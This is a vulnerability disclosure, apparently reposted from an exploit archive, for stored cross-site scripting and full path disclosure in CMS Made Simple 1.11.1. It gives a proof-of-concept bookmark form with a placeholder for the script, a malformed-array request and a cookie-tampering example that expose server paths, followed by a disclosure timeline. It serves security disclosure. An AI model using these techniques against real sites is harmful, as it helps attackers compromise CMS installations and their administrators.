Stored XSS and Full Path Disclosure in CMS MadeSimple 1.11.1
# Author : ZwX
# Date : 09/02/2015
# Download : http://www.cmsmadesimple.fr/telecharger-cms
# Vendor : http://www.cmsmadesimple.fr/
# Tested on : Windows 7
+=====================+
Description :
+=====================+
Stored Cross Site Scripting vulnerability that is discovered in the user login interface.
Module : (Manage Shortcuts) and click (Add Shortcut)
+=====================+
Proof Of Concept :
+=====================+
<form method="post" action="addbookmark.php?_sx_=9136d3ce1a6e559c">
<input type="hidden" name="_sx_" value="9136d3ce1a6e559c" />
<div class="pageoverflow">
<p class="pagetext">Title:</p>
<p class="pageinput"><input type="text" name="title" maxlength="255" value="[XSS Stored Here]" /></p>
<input type="hidden" name="addbookmark" value="true" />
<input type="submit" value="Submit" class="pagebutton" />
<input type="submit" name="cancel" value="Cancel" class="pagebutton" />
</div>
</form>
+=====================+
Description :
+=====================+
# A vulnerability displays the full path to the vulnerable script while indicating the type of vulnerability:
trim()
# Vulnerability lies in the page.functions.php file
+=====================+
Proof Of Concept :
+=====================+
/index.php?page[]=minimal-template
Results : Warning: trim() expects parameter 1 to be string, array given in
C:\Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\lib\page.functions.php on line 803
Injection TamperData Cookie :
_sx_=f07a39ba13846fce;
cms_admin_user_id=1;
cms_passhash=02d21a40e06c430127cca40a20243f22;
PHPSESSID=jihp50tjff0kdkqjdnelkmmig4; CMSSESSID1ae59f24=//setcookie()
Results : Warning: session_start():
The session id is too long or contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in C:
\Program Files\EasyPHP-DevServer-14.1VC11\data\localweb\projects\cmsmadesimple\include.php on line 50
[#] 09/02/2015: Vulnerability found
[#] 09/02/2015: Vendor informed
[#] 16/02/2015: No new vendor
[#] 16/02/2015: Vulnerability disclosure
# 0day.today [2018-03-14] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo